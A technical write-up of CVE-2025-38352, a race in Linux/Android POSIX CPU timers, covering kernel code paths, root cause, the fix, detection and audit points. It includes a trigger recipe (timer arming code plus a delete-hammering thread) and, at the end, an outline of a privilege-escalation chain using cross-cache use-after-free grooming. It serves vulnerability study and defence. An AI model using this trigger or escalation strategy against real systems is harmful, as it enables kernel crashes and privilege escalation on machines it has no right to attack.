POSIX CPU Timers TOCTOU race (CVE-2025-38352)

This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.

Affected component: kernel/time/posix-cpu-timers.c
Primitive: expiry vs deletion race under task exit
Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)

Quick internals recap (relevant for exploitation)

- Three CPU clocks drive accounting for timers via cpu_clock_sample():
  - CPUCLOCK_PROF: utime + stime
  - CPUCLOCK_VIRT: utime only
  - CPUCLOCK_SCHED: task_sched_runtime()
- Timer creation wires a timer to a task/pid and initializes the timerqueue nodes:

static int posix_cpu_timer_create(struct k_itimer *new_timer) {
    struct pid *pid;
    rcu_read_lock();
    pid = pid_for_clock(new_timer->it_clock, false);
    if (!pid) { rcu_read_unlock(); return -EINVAL; }
    new_timer->kclock = &clock_posix_cpu;
    timerqueue_init(&new_timer->it.cpu.node);
    new_timer->it.cpu.pid = get_pid(pid);
    rcu_read_unlock();
    return 0;
}
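The three clocks from the recap can be approximated from userspace, which helps when reasoning about which clock a given timer is charged against. The sketch below is illustrative only: the helper names (tv_to_ns, sample_prof_ns, sample_virt_ns, sample_sched_ns) are hypothetical, and the mapping of getrusage() and CLOCK_PROCESS_CPUTIME_ID onto the PROF/VIRT/SCHED clocks is an assumption about how the kernel accounts them, not kernel code.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <time.h>

/* Convert a struct timeval to nanoseconds. */
static uint64_t tv_to_ns(struct timeval tv)
{
    return (uint64_t)tv.tv_sec * 1000000000ull + (uint64_t)tv.tv_usec * 1000ull;
}

/* PROF-style sample (assumed analogue): user + system time of this process. */
static uint64_t sample_prof_ns(void)
{
    struct rusage ru;

    if (getrusage(RUSAGE_SELF, &ru) != 0)
        return 0;
    return tv_to_ns(ru.ru_utime) + tv_to_ns(ru.ru_stime);
}

/* VIRT-style sample (assumed analogue): user time only. */
static uint64_t sample_virt_ns(void)
{
    struct rusage ru;

    if (getrusage(RUSAGE_SELF, &ru) != 0)
        return 0;
    return tv_to_ns(ru.ru_utime);
}

/* SCHED-style sample (assumed analogue): runtime from the process CPU clock. */
static uint64_t sample_sched_ns(void)
{
    struct timespec ts;

    if (clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &ts) != 0)
        return 0;
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
```

Calling the three helpers before and after a CPU-bound loop shows all values growing, with the PROF-style value never smaller than the VIRT-style one because it adds system time on top of user time.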

Arming inserts into a per-base timerqueue and may update the next-expiry cache:

static void arm_timer(struct k_itimer *timer, struct task_struct *p) {
    struct posix_cputimer_base *base = timer_base(timer, p);
    struct cpu_timer *ctmr = &timer->it.cpu;
    u64 newexp = cpu_timer_getexpires(ctmr);
    if (!cpu_timer_enqueue(&base->tqhead, ctmr)) return;
    if (newexp < base->nextevt) base->nextevt = newexp;
}
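The interaction between enqueueing and the next-expiry cache can be modelled in a few lines of userspace C. This is a toy sketch under stated assumptions: struct toy_base, toy_enqueue() and toy_arm() are hypothetical stand-ins, and a sorted array replaces the kernel's timerqueue. It only illustrates that the cache is touched when the new timer becomes the earliest entry.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_MAX_TIMERS 16

/* Hypothetical stand-in for a per-clock base: sorted expiries plus a cache. */
struct toy_base {
    uint64_t expiries[TOY_MAX_TIMERS]; /* kept in ascending order */
    size_t count;
    uint64_t nextevt;                  /* UINT64_MAX means nothing is armed */
};

static void toy_base_init(struct toy_base *b)
{
    b->count = 0;
    b->nextevt = UINT64_MAX;
}

/* Insert in sorted position; return true only if the entry became the head. */
static bool toy_enqueue(struct toy_base *b, uint64_t exp)
{
    size_t pos = b->count;

    if (b->count == TOY_MAX_TIMERS)
        return false;
    while (pos > 0 && b->expiries[pos - 1] > exp) {
        b->expiries[pos] = b->expiries[pos - 1];
        pos--;
    }
    b->expiries[pos] = exp;
    b->count++;
    return pos == 0;
}

/* Mirrors the shape of arm_timer(): update the cache only for a new head. */
static void toy_arm(struct toy_base *b, uint64_t newexp)
{
    if (!toy_enqueue(b, newexp))
        return;
    if (newexp < b->nextevt)
        b->nextevt = newexp;
}
```

Arming expiries 100, 50 and 70 in that order leaves the cache at 50: the third call does not become the head, so the cache is left alone.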

Fast path avoids expensive processing unless cached expiries indicate possible firing:

static inline bool fastpath_timer_check(struct task_struct *tsk) {
    struct posix_cputimers *pct = &tsk->posix_cputimers;
    if (!expiry_cache_is_inactive(pct)) {
        u64 samples[CPUCLOCK_MAX];
        task_sample_cputime(tsk, samples);
        if (task_cputimers_expired(samples, pct))
            return true;
    }
    return false;
}
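The two helpers used by the fast path are not shown in the excerpt. A minimal userspace model, assuming that an inactive cache means every per-clock next-expiry value is at its maximum and that "expired" means any sample has reached its cached value, could look as follows. All toy_* names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

enum { TOY_PROF, TOY_VIRT, TOY_SCHED, TOY_CLOCK_MAX };

/* Hypothetical stand-in for the per-task expiry cache. */
struct toy_cputimers {
    uint64_t nextevt[TOY_CLOCK_MAX]; /* UINT64_MAX means no timer armed */
};

/* Assumed semantics: the cache is inactive when no clock has a pending expiry. */
static bool toy_cache_inactive(const struct toy_cputimers *pct)
{
    for (int i = 0; i < TOY_CLOCK_MAX; i++) {
        if (pct->nextevt[i] != UINT64_MAX)
            return false;
    }
    return true;
}

/* Assumed semantics: expired when any sample has reached its cached expiry. */
static bool toy_expired(const uint64_t *samples, const struct toy_cputimers *pct)
{
    for (int i = 0; i < TOY_CLOCK_MAX; i++) {
        if (samples[i] >= pct->nextevt[i])
            return true;
    }
    return false;
}

/* Same control flow as the fast-path check in the excerpt above. */
static bool toy_fastpath_check(const uint64_t *samples,
                               const struct toy_cputimers *pct)
{
    if (!toy_cache_inactive(pct))
        return toy_expired(samples, pct);
    return false;
}
```

With every clock sampled at 10, the check returns false for an empty cache, true once any cached expiry is at or below 10, and false again when the earliest cached expiry is 11.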

Expiration collects expired timers, marks them firing, moves them off the queue; actual delivery is deferred:

#define MAX_COLLECTED 20
static u64 collect_timerqueue(struct timerqueue_head *head,
                              struct list_head *firing, u64 now) {
    struct timerqueue_node *next; int i = 0;
    while ((next = timerqueue_getnext(head))) {
        struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);
        u64 expires = cpu_timer_getexpires(ctmr);
        if (++i == MAX_COLLECTED || now < expires) return expires;
        ctmr->firing = 1;                           // critical state
        rcu_assign_pointer(ctmr->handling, current);
        cpu_timer_dequeue(ctmr);
        list_add_tail(&ctmr->elist, firing);
    }
    return U64_MAX;
}
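One detail of the loop above is easy to miss: because the counter is pre-incremented before the comparison, a single pass collects at most MAX_COLLECTED - 1 timers. The following userspace sketch reproduces only the loop condition over a sorted array; toy_collect() and its parameters are hypothetical, and the firing/list bookkeeping is reduced to a counter.

```c
#include <stddef.h>
#include <stdint.h>

#define TOY_MAX_COLLECTED 20

/*
 * sorted:    expiries in ascending order (stand-in for the timerqueue)
 * n:         number of entries
 * now:       current clock sample
 * collected: out parameter, number of timers that would be marked firing
 *
 * Returns the expiry of the first timer left on the queue, or UINT64_MAX
 * if the queue was drained.
 */
static uint64_t toy_collect(const uint64_t *sorted, size_t n, uint64_t now,
                            size_t *collected)
{
    int i = 0;

    *collected = 0;
    for (size_t idx = 0; idx < n; idx++) {
        uint64_t expires = sorted[idx];

        /* Same condition as the excerpt: cap reached or not yet expired. */
        if (++i == TOY_MAX_COLLECTED || now < expires)
            return expires;
        (*collected)++; /* the kernel would set firing and move the node */
    }
    return UINT64_MAX;
}
```

With 25 already-expired timers, one pass collects 19 and returns the expiry of the 20th, which then becomes the cached next event for the following pass.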

Two expiry-processing modes

- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context

POSIX CPU timer run paths

void run_posix_cpu_timers(void) {
    struct task_struct *tsk = current;
    __run_posix_cpu_timers(tsk);
}
#ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
    if (WARN_ON_ONCE(tsk->posix_cputimers_work.scheduled)) return;
    tsk->posix_cputimers_work.scheduled = true;
    task_work_add(tsk, &tsk->posix_cputimers_work.work, TWA_RESUME);
}
#else
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
    lockdep_posixtimer_enter();
    handle_posix_cpu_timers(tsk);                  // IRQ-context path
    lockdep_posixtimer_exit();
}
#endif

In the IRQ-context path, the firing list is processed after the sighand lock has been dropped:

IRQ-context handling path

static void handle_posix_cpu_timers(struct task_struct *tsk) {
    struct k_itimer *timer, *next; unsigned long flags, start;
    LIST_HEAD(firing);
    if (!lock_task_sighand(tsk, &flags)) return;   // may fail on exit
    do {
        start = READ_ONCE(jiffies); barrier();
        check_thread_timers(tsk, &firing);
        check_process_timers(tsk, &firing);
    } while (!posix_cpu_timers_enable_work(tsk, start));
    unlock_task_sighand(tsk, &flags);              // race window opens here
    list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
        int cpu_firing;
        spin_lock(&timer->it_lock);
        list_del_init(&timer->it.cpu.elist);
        cpu_firing = timer->it.cpu.firing;         // read then reset
        timer->it.cpu.firing = 0;
        if (likely(cpu_firing >= 0)) cpu_timer_fire(timer);
        rcu_assign_pointer(timer->it.cpu.handling, NULL);
        spin_unlock(&timer->it_lock);
    }
}

Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit

Preconditions

- CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
- The target task is exiting but not fully reaped
- Another thread concurrently calls posix_cpu_timer_del() for the same timer

Sequence

1) update_process_times() triggers run_posix_cpu_timers() in IRQ context for the exiting task.
2) collect_timerqueue() sets ctmr->firing = 1 and moves the timer to the temporary firing list.
3) handle_posix_cpu_timers() drops sighand via unlock_task_sighand() to deliver timers outside the lock.
4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and thus skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if not firing, corrupting state while expiry is being handled, leading to crashes/UB.
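The decision described in step 5 can be captured in a small userspace model. This is a simplified sketch, not the kernel function: struct toy_timer, toy_timer_del() and the two boolean parameters (standing in for the results of cpu_timer_task_rcu() and lock_task_sighand()) are hypothetical, and the branch structure is an assumption based on the sequence above.

```c
#include <stdbool.h>

enum toy_del_result { TOY_DEL_OK = 0, TOY_DEL_RETRY = 1 };

/* Hypothetical reduction of the timer state relevant to deletion. */
struct toy_timer {
    int firing;   /* set while expiry processing owns the timer */
    bool queued;  /* still linked on a timerqueue */
};

/*
 * task_found:     models a successful task lookup
 * sighand_locked: models successfully taking the sighand lock
 *
 * The firing flag is consulted only when both succeed.
 */
static enum toy_del_result toy_timer_del(struct toy_timer *t, bool task_found,
                                         bool sighand_locked)
{
    if (!task_found)
        return TOY_DEL_OK;      /* task already gone: nothing is checked */
    if (!sighand_locked)
        return TOY_DEL_OK;      /* lock failed: firing is never consulted */
    if (t->firing)
        return TOY_DEL_RETRY;   /* normal in-flight guard */
    t->queued = false;          /* stand-in for disarming the timer */
    return TOY_DEL_OK;
}
```

With firing set, the model returns TOY_DEL_RETRY only when both lookups succeed. If either fails, deletion reports success even though expiry processing still holds the timer, which is the overlap the sequence describes.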

Why TASK_WORK mode is safe by design

- With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.
- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.

Fix (Android common kernel) and rationale

- Add an early return if the current task is exiting, gating all processing:

// kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
if (tsk->exit_state)
    return;

This prevents entering handle_posix_cpu_timers() for exiting tasks, eliminating the window where posix_cpu_timer_del() could miss it.cpu.firing and race with expiry processing.

Impact

- Corruption of kernel timer structures during concurrent expiry/deletion can cause immediate crashes (DoS) and, combined with further primitives, can serve as a step toward privilege escalation.

Triggering the bug (safe, reproducible conditions)

Build/config

- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix.

Runtime strategy

- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
  - For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, ...)
  - For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, ...)
- Arm with a very short initial expiration and small interval to maximize IRQ-path entries:

static timer_t t;
static void setup_cpu_timer(void) {
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_SIGNAL;    // delivery type not critical for the race
    sev.sigev_signo = SIGUSR1;
    if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &t)) perror("timer_create");
    struct itimerspec its = {0};
    its.it_value.tv_nsec = 1;           // fire ASAP
    its.it_interval.tv_nsec = 1;        // re-fire
    if (timer_settime(t, 0, &its, NULL)) perror("timer_settime");
}

From a sibling thread, concurrently delete the same timer while the target thread exits:

void *deleter(void *arg) {
    for (;;) (void)timer_delete(t);     // hammer delete in a loop
}

Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() fails to notice it.cpu.firing because task lookup or locking fails right after unlock_task_sighand().

Detection and hardening

- Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
- Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.
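For fleet auditing, a first triage step is to check whether a kernel configuration enables the task_work path. The helper below is a minimal sketch that scans configuration text already loaded into memory; task_work_enabled() is a hypothetical name, and how the text is obtained (build tree, packaged config file, or an exported in-kernel copy) is left to the caller because it varies between systems.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/*
 * Return true if config_text contains a line that is exactly
 * "CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y". Commented-out entries such as
 * "# CONFIG_... is not set" and a missing entry both count as disabled.
 */
static bool task_work_enabled(const char *config_text)
{
    static const char key[] = "CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y";
    const size_t klen = sizeof(key) - 1;
    const char *line = config_text;

    while (line && *line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);

        /* Exact whole-line match avoids hits inside comments or longer names. */
        if (len == klen && strncmp(line, key, klen) == 0)
            return true;
        line = eol ? eol + 1 : NULL;
    }
    return false;
}
```

A false result only indicates that the IRQ-context expiry path is in use; whether the kernel is actually affected still depends on the presence of the exit_state guard described above.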

Audit hotspots (for reviewers)

- update_process_times() → run_posix_cpu_timers() (IRQ)
- __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
- collect_timerqueue(): sets ctmr->firing and moves nodes
- handle_posix_cpu_timers(): drops sighand before firing loop
- posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap

Notes for exploitation research

- The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.

Chronomaly exploit strategy (priv-esc without fixed text offsets)

Tested target & configs: x86_64 v5.10.157 under QEMU (4 cores, 3 GB RAM). Critical options: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n, CONFIG_PREEMPT=y, CONFIG_SLAB_MERGE_DEFAULT=n, DEBUG_LIST=n, BUG_ON_DATA_CORRUPTION=n, LIST_HARDENED=n.
Race steering with CPU timers: A racing thread (race_func()) burns CPU while CPU timers fire; free_func() polls SIGUSR1 to confirm if the timer fired. Tune CPU_USAGE_THRESHOLD so signals arrive only sometimes (intermittent "Parent raced too late/too early" messages). If timers fire every attempt, lower the threshold; if they never fire before thread exit, raise it.
Dual-process alignment into send_sigqueue(): Parent/child processes try to hit a second race window inside send_sigqueue(). The parent sleeps PARENT_SETTIME_DELAY_US microseconds before arming timers; adjust downward when you mostly see "Parent raced too late" and upward when you mostly see "Parent raced too early". Seeing both indicates you are straddling the window; success is expected within ~1 minute once tuned.
Cross-cache UAF replacement: The exploit frees a struct sigqueue then grooms allocator state (sigqueue_crosscache_preallocs()) so both the dangling uaf_sigqueue and the replacement realloc_sigqueue land on a pipe buffer data page (cross-cache reallocation). Reliability assumes a quiet kernel with few prior sigqueue allocations; if per-CPU/per-node partial slab pages already exist (busy systems), the replacement will miss and the chain fails. The author intentionally left it unoptimized for noisy kernels.
